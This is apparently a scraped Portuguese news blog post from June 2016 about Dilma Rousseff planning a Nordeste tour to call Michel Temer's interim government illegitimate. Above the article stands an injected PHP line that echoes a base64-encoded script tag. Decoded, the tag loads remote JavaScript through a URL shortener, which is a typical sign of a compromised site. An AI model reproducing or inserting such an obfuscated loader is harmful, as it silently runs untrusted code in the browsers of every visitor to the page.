$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Dilma virá ao Nordeste apontar “retrocessos” de Temer

foto: Marcello Casal/Agência Brasil
12 Jun 2016

O jornal Folha de São Paulo, edição de hoje, em reportagem assinada por Marina Dias, destaca que  um mês após seu afastamento da Presidência da República, Dilma Rousseff decidiu viajar ao Nordeste, reduto eleitoral do PT, para replicar o discurso de que o governo interino de Michel Temer é “ilegítimo” e “quer impor retrocessos à população”.

A previsão é que Dilma faça uma fala na Assembleia Legislativa de João Pessoa (PB), na quarta-feira (15), siga a Salvador (BA), na quinta (16), e termine o roteiro na sexta (17), em Recife (PE).

Durante suas aparições públicas, a petista deve reforçar a tese de que Temer quer “rasgar a CLT” com a reforma da Previdência e “reduzir programas sociais, principalmente o Bolsa Família”, com os cortes no Orçamento.

O presidente interino, por sua vez, tem dito que não vai cortar direitos adquiridos dos trabalhadores nem mesmo reduzir os programas sociais.

Oficialmente, a equipe de Temer diz que ainda estuda as medidas que seriam anunciadas e que o presidente interino vai pessoalmente esta semana levar ao Congresso a PEC (Proposta de Emenda Constitucional) para limitar o aumento do gasto público à variação da inflação.

Desde que foi afastada do cargo, em 12 de maio, Dilma tem intensificado suas interações nas redes sociais e concedido diversas entrevistas para a imprensa nacional e estrangeira, sempre dizendo que é “vítima de um golpe” e que Temer “não tem legitimidade” para governar.

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *